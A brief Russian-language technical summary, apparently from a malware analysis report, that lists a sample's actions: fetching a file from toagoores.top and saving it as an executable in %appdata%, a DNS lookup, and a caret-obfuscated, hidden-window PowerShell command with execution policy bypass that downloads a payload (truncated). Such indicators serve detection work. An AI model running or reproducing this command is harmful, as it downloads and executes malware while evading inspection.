Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^wer^S^h^eLl^.EXE -ex^E^cutionPOlicy ^bYpa^ss -NOpr^O^FiLE -WinD^OwST^YLe h^iD^DeN^ (New^-^oBj^eCt^ sYsTem^.neT^.^WEb^clieNT).^d^OwN^LO^aD^F^iLe('http://toagoores.top/read.php?...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "po^wer^S^h^eLl^.EXE -ex^E^cutionPOlicy ^bYpa^ss -NOpr^O^FiLE -WinD^OwST^YLe h^iD^DeN^ (New^-^oBj^eCt^ sYsTem^.neT^.^WEb^clieNT).^d^OwN^LO^aD^F^iLe('http://toagoores.top/read.php?...' (со скрытым окном)